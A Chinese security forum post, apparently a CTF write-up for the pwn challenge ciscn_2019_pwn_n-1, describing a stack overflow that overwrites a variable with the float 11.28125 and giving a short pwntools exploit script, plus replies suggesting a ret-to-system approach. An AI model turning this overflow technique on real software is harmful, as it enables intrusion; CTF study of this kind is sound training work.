查看: 54|回复: 2

[Pwn] ciscn_2019_pwn_n-1

[复制链接]
发表于 5 天前 | 显示全部楼层 |阅读模式
题目链接:https://www.xuenixiang.com/ctfexercise-competition-416.html
checksec一下

ciscn_2019_pwn_n-1

ciscn_2019_pwn_n-1

IDA打开,发现如果满足的条件达成,就能get flag
找到栈溢出漏洞,输入可以覆盖到v2

ciscn_2019_pwn_n-1

ciscn_2019_pwn_n-1

写代码把11.28125在内存中的十六进制表示出来

ciscn_2019_pwn_n-1

ciscn_2019_pwn_n-1

ciscn_2019_pwn_n-1

ciscn_2019_pwn_n-1

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sl=lambda x:io.sendline(x)

io=remote('xxx',xxx)

payload='a'*(0x30-0x4)+p32(0x41348000)
sl(payload)

io.interactive()



温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的最好奖励,还可以获得学币奖励,请尊重作者的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
论坛交流群:672619046

0

主题

4

帖子

0

精华

VIP

Rank: 16

学币
58
荣耀
0
rank
25
违规
0

    发表于 4 天前 | 显示全部楼层
    这个我想要的方法。虽然计算v2看不懂。这题最简单的做法是直接ret到system就可以了。但是这个方法确实很赞。
     楼主| 发表于 4 天前 | 显示全部楼层
    xiaofei0115 发表于 2020-5-23 13:00
    这个我想要的方法。虽然计算v2看不懂。这题最简单的做法是直接ret到system就可以了。但是这个方法确实很赞 ...

    https://www.xuenixiang.com/thread-2261-1-1.html,可以看一下这篇帖子
    论坛交流群:672619046
    快速回复 返回顶部 返回列表